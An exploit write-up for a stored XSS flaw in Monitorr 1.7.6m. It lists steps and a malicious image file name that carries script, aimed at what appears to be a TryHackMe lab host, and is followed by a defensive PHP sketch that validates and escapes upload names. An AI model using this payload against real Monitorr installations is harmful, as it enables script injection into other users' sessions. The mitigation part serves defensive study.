`# Exploit Title: Monitorr 1.7.6m - File Upload to XSS
# Date: 25/4/2021
# Exploit Author: Ahmad Shakla
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Kali GNU/Linux 2020.2
# Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html
An attacker can perform an XSS attack via image upload.
Steps:
1) Create a payload with the following format:
><img src=x onerror=alert("XSS")>.png
2) Install the database by going to the following link:
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php
3) Register for a new account on the server by going to the following link:
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register
4) Log in with your credentials at the following link:
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php
5) Go to the following link and upload the payload:
https://monitorr.robyns-petshop.thm/settings.php#services-configuration
`
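
A defensive sketch of the two controls that stop this class of bug, added here as an example and not taken from Monitorr's code base: never keep the client-supplied file name as the stored name, and HTML-escape it wherever it is displayed. The function names `storage_name_for` and `html_name` are hypothetical, and the example assumes the uploaded image's name is later written into the settings page markup.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not Monitorr's code) for handling an uploaded image name.
const ALLOWED_EXT = ['png', 'jpg', 'jpeg', 'gif'];

/**
 * Return a server-generated storage name, or null if the client name is rejected.
 * The client-supplied name is never reused as the on-disk name.
 */
function storage_name_for(string $clientName): ?string
{
    // Drop any directory part, treating backslashes as separators too.
    $base = basename(str_replace('\\', '/', $clientName));

    // Allowlist: must start with a letter or digit; only letters, digits,
    // space, dot, dash and underscore after that; at most 100 characters.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9 ._-]{0,99}\z/', $base)) {
        return null;
    }

    // Only the final extension is kept, and only if it is an image type.
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }

    // Random name, so nothing attacker-chosen reaches the file system or a URL.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/** Escape a file name for an HTML text node or a quoted attribute value. */
function html_name(string $name): string
{
    return htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input: the file name from step 1 and a benign one.
$samples = ['><img src=x onerror=alert("XSS")>.png', 'plex logo.png'];

foreach ($samples as $name) {
    $stored = storage_name_for($name);
    // The original name is shown only in escaped form.
    printf("%-60s stored as: %s\n", html_name($name), $stored ?? '(rejected)');
}
```

The allowlist alone would block the name from step 1, but escaping at output is still needed for names already stored and for any other untrusted value rendered on the same page.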